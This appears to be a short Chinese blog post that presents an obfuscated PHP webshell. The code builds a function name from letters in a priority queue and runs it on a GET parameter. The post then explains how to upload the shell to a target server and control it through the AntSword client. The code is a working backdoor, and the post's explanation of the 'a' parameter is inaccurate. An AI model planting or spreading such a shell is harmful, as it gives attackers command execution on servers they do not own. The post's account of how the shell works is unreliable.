PHP Webshell 分析及蚁剑连接方法
insert('m',1);
$objPQ->insert('s',6);
$objPQ->insert('e',3);
$objPQ->insert('s',4);
$objPQ->insert('y',5);
$objPQ->insert('t',$_GET['a']);
$objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA);
//Go to TOP
$objPQ->top();
$m='';
$cur = new ErrorException($_GET['b']);
while($objPQ->valid()){
$m.=$objPQ->current();
$objPQ->next();
}
echo $m($cur->getMessage());
?>
该 PHP Webshell 的密钥是 $_GET['a'],也就是通过 GET 参数 'a' 传递的值。我们可以通过访问该 Webshell 时,传递不同的 'a' 值,来执行不同的命令。
例如,我们可以通过访问 http://example.com/webshell.php?a=system 来执行系统命令 system。
要使用蚁剑连接这个 Webshell,我们可以先将该 PHP 文件上传到目标服务器上,然后在蚁剑中选择 PHP Webshell 的连接方式,并填写正确的 URL 和密钥(即 'a' 参数的值)即可。连接成功后,我们就可以在蚁剑中执行命令,或者上传、下载文件等操作了。
原文地址: https://www.cveoy.top/t/topic/lPsy 著作权归作者所有。请勿转载和采集!